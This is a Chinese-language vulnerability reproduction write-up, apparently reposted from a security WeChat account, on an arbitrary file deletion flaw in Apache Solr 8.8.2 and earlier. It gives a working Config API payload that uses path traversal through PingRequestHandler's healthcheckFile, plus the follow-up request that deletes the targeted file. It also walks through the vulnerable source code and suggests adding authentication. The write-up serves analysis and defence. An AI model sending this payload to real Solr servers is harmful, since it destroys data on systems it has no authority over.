Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。
这是个"任意"文件删除漏洞, 可以删除 Files.delete() 能删的任何文件。
Solr <= 8.8.2
1、先在官网上下个 8.8.2 的 Solr 的安装包, 我这里为了方便就装个 Windows 版的
https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/8.8.2/2、开一个有 core 的实例, 我这里用的是 DataImportHandler 的范例配置,进入bin目录下执行
solr.cmd -e dih访问:http://IP:8983/solr/#/
1、在C盘下新建一个test.txt
2、向任意 core 的 config API 发送一个 POST 包,例如 /solr/db/config 或者 /solr/solr/config 之类的
{"add-requesthandler": {"name": "/test1", // 这里填 RequestHandler 的路径"class":"solr.PingRequestHandler","healthcheckFile":"../../../../../../../../../../../../../Windows/Temp/test.txt",}}
2、访问
http://172.16.255.2:8983/solr/db/config/overlay?omitHeader=true检查是否创建成功
3、向之前发送包的 config API 发送一个 GET 请求, 参数为action=DISABLE 例如:/solr/db/test1?action=DISABLE
这时会删除之前设置的文件, 同理 action=ENABLE 会生成之前设置的同名文件, 里面写的是一串 healthcheck 信息. 注意 /test 是之前设置过的路径
很明显这个漏洞源自于 PingRequestHandler, 当一个 Config API POST 请求被提交之后, Solr 先是执行 handlePOST 函数, 经过一堆 load 和 get 之后会初始化一个 PingRequestHandler
public void handleRequestBody(SolrQueryRequest req, SolrQueryResponse rsp) throws Exception {...if ("POST".equals(httpMethod)) {...try {command.handlePOST();}...}}
然后这个PingRequestHandler在得到GET指令之后会直接执行 java.nio.file.Files 修改文件的操作而不检查文件的路径信息
protected void handleEnable(boolean enable) throws SolrException {...if ( enable ) {try {// write out when the file was createdFileUtils.write(healthcheck, Instant.now().toString(), "UTF-8");}...} else {try {Files.deleteIfExists(healthcheck.toPath());}...}}
1、官方没有修复建议,毕竟 Files.delete() 有 IOException 兜底,不过可以为 Solr 配置身份校验插件, 从而避免任意用户修改 config;
2、Config API 这种东西就应该给配置个身份验证, 并且也不应该对外开放。
参考链接:
https://mp.weixin.qq.com/s/dECH74n5qjrWT9lok8IkPQ
本文始发于微信公众号(Timeline Sec):Apache Solr <= 8.8.2任意文件删除漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论